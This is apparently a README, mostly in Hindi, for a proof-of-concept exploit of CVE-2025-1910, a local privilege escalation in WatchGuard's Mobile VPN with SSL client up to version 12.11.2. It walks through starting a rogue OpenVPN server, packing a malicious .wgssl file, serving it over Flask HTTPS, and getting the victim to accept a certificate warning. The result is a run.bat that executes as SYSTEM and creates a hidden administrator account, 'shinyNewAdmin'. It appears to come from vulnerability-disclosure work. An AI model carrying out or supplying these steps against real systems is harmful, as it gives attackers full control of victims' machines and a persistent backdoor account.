
CVE-2025-1910 का शोषण करने के लिए Proof-of-Concept, जो Watchguard's Mobile VPN with SSL client के भीतर एक स्थानीय विशेषाधिकार वृद्धि है।
WatchGuard के Mobile VPN with SSL <= 12.11.2 में एक विशेषाधिकार वृद्धि कमजोरी एक निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता को क्लाइंट पर SYSTEM के रूप में कमांड निष्पादित करने की अनुमति देती है। Mobile VPN with SSL संस्करण 12.11.2 के साथ परीक्षण किया गया।
अधिक जानकारी के लिए, हमारा ब्लॉग लेख देखें (जर्मन संस्करण).
sudo openvpn --config server.conf

./client/client.ovpn में remote विकल्प को संशोधित करें ताकि वह OpenVPN सर्वर की ओर इंगित करे
./client/run.bat को अपनी पसंद के अनुसार संशोधित करें, यह स्क्रिप्ट SYSTEM के रूप में निष्पादित होगी। डिफ़ॉल्ट रूप से, एक नया व्यवस्थापक उपयोगकर्ता बनाया जाता है (shinyNewAdmin)
दुर्भावनापूर्ण WatchGuard client.wgssl फ़ाइल बनाएं:
cd client/
# Create checksum
md5sum client.ovpn run.bat > MD5SUM
# Pack into a .wgssl file
tar -czf ../client_exploit.wgssl client.ovpn MD5SUM run.bat
cd ..
client.wgssl फ़ाइल को flask के माध्यम से परोसें:# Start the flask HTTPS server
sudo python3 srv.py

वैकल्पिक रूप से, openssl के माध्यम से एक नया प्रमाणपत्र और कुंजी जोड़ा बनाया जा सकता है:
# Create certificate and private key for the HTTPS connection
openssl req -x509 -newkey rsa:4096 -nodes -out server.crt -keyout server.key -days 365 -subj "/CN=firebox"
फिर, पीड़ित मशीन पर जहां Mobile VPN with SSL का एक कमजोर संस्करण स्थापित है (जैसे संस्करण 12.11.2, डाउनलोड), हमलावर सर्वर से कनेक्ट करने का प्रयास करें। दर्ज किया गया उपयोगकर्ता नाम और पासवर्ड मायने नहीं रखता:

सुरक्षा चेतावनी पर हाँ क्लिक करें ताकि प्रमाणपत्र चेतावनियों को अनदेखा किया जा सके:

कनेक्शन सफलतापूर्वक स्थापित होने के बाद, run.bat फ़ाइल निष्पादित होती है और shinyNewAdmin उपयोगकर्ता बनाया जाता है:

हमलावर सर्वर पर आपको Python, openssl और openvpn स्थापित होना चाहिए। इसके अतिरिक्त, flask Python पैकेज स्थापित होना चाहिए:
pip install -r requirements.txt
Nix स्थापित होने पर, आप केवल डेवलपमेंट शेल शुरू कर सकते हैं:
nix develop